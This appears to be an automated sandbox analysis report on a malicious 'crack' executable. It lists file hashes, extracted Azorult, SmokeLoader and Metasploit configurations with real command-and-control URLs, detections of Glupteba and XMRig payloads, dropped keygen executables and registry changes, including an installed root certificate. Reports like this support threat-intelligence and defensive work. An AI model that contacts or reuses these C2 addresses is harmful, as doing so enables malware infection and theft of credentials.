Analysis
-
max time kernel
48s -
max time network
303s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03/04/2021, 07:46
Static task
static1
Behavioral task
behavioral1
Sample
Tekla_Structures_Extension_crack.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Tekla_Structures_Extension_crack.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Tekla_Structures_Extension_crack.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Tekla_Structures_Extension_crack.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Tekla_Structures_Extension_crack.exe
Resource
win7v20201028
General
-
Target
Tekla_Structures_Extension_crack.exe
-
Size
5.4MB
-
MD5
baad366f257529076340afc66d1ac59c
-
SHA1
3dafcc431b85bd6a527e70879137e1f27e160849
-
SHA256
3f5a92454d1b626e24016329a9de52e40d78aae1e5977f53e820a2e2812d3975
-
SHA512
98d2e5ace89934ebc193ae6b8277b363d9d197a54bbcf6dfa3f40df2671d89c87e4d13737ea99eceb9a2a1ac3bd135ffa53d555f93f72ff2a36f1874cb94dd85
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/3252-199-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/3252-201-0x0000000002570000-0x0000000002E7A000-memory.dmp family_glupteba behavioral2/memory/3252-202-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/3468-153-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/3468-154-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/3468-161-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/3468-222-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 10 IoCs
pid Process 3912 keygen-pr.exe 1020 keygen-step-1.exe 1568 keygen-step-3.exe 3092 keygen-step-4.exe 2060 Setup.exe 3824 key.exe 2300 multitimer.exe 3680 setups.exe 1312 askinstall20.exe 1344 setups.tmp -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 1344 setups.tmp 1344 setups.tmp 1344 setups.tmp 1344 setups.tmp 1344 setups.tmp 1344 setups.tmp 1344 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 139 ipinfo.io 217 ip-api.com 270 api.ipify.org 304 ip-api.com 358 ipinfo.io 360 ipinfo.io 121 api.ipify.org 134 ipinfo.io -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 3 IoCs
pid pid_target Process procid_target 9100 644 WerFault.exe 155 7940 644 WerFault.exe 155 6280 644 WerFault.exe 155 -
Delays execution with timeout.exe 1 IoCs
pid Process 5300 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 4304 taskkill.exe 1688 taskkill.exe 6848 taskkill.exe 3900 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active\{320AE721-C9C7-474E-8C0C-C8EC99FC751E} = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\FontSize = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "5" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000ac2e246ebec223de0213b32d31ff8a3f34a5e12a316ff25e2bdd71960b2f0e138f646919d13ff4a13d3b3ac7dca5bb26cb514b319f88968f05301bd4005636150b90b86269dea757d7009f764775451aed8376fcb213ff450b304b5a577614c2c6d00feb723d6f1b5f8384e5690d6a1e885abd702baf9ff942fd5147fd2e372ccc45ed355ffd4836a6e24035d10e4d6e50f691e1d3fbedab23b71daf822059d415108792c9be1259553f2f2b0f1928892b7776e33e994f67617ed51689ebf7376b4fdb5a8220b3e681b87e93c7cc5fd1a1fc3b70652888d577728bb9842f1d009523407f95c31f4e7c6f0bf14cc9f3bbe9a7185dcb4772df62b332a49d8c4fb5ecac6863ff471076c682e85f05aec78c0097c71f4998bd5f4561319bf2a206041a0bee094e4d76382913ffb3ba1cd1a755ec0fdf68ba4fe6139c14d50e11bf96435ef89072736ce7a5400bdf20b4e46d63c66edc974ccf8a0884b98226793a78e2c6cfff385af3ee132b921fd214caaaad4410230ef012cef03944264f7ab50d7f64c862eaa2957a85f21bfe6cdee0959288b3931d45028fdbbfd28466d39bad6c3d1312f48f MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000538449bacb1d69e57ded329594aacb8f03efce69afad4c87b8cd6cd19c59b0dbfaf1a951d0746005430883edbbb7895a5e72ace35bf8d6ad12b5 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionLow = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000a7997447cf2d8eef61cd107fb8da8a619feec64df3fe03baece9a8def8d41500ce0f6c4b546b8201d93424e2e14462962cd1a21d8ef6c76da621c11025cdf0508346f034dc651409276592813b0080c78d87a3a64d8eb9438e96 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 96aea8fd6e28d701 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\DetectPhoneNumberComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Toolbar\WebBrowser MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension = "{3280D0C5-A6C6-4901-8C2E-2AE7834E8D19}" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\SmartScreenCompletedVersi = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\Extension MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IntelliForms MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites\Order = 0c0000000a000000000000000c0000000100000000000000 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 3168 PING.EXE 5848 PING.EXE 5284 PING.EXE -
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
